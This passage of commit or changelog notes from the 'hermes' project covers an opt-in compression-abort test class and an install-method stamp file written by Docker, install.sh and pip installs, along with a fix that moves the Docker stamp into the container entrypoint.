TestAbortOnSummaryFailure class for the opt-in mode.
Gateway/CLI plumbing (force=True on /compress, hygiene/handler abort
detection, locale `gateway.compress.aborted` key) from PR #28102 stays
intact — those paths only fire when `_last_compress_aborted` is True,
which now only happens when the flag is enabled.
* feat(config): add install-method stamping + Docker detection
Dockerfile stamps "docker", install.sh stamps "git", and cmd_postinstall
stamps "pip" into ~/.hermes/.install_method. detect_install_method() reads
the stamp first, then falls back to managed-system / container / .git
heuristics. Adds Docker upgrade guidance.
Tracking: #27826
* fix(stamp): move Docker stamp to entrypoint, install.sh stamp after print_success
The Dockerfile stamp was overwritten by the VOLUME overlay at container
start. Moving it to entrypoint.sh ensures it persists. The install.sh
stamp now writes after print_success so it only lands on full success.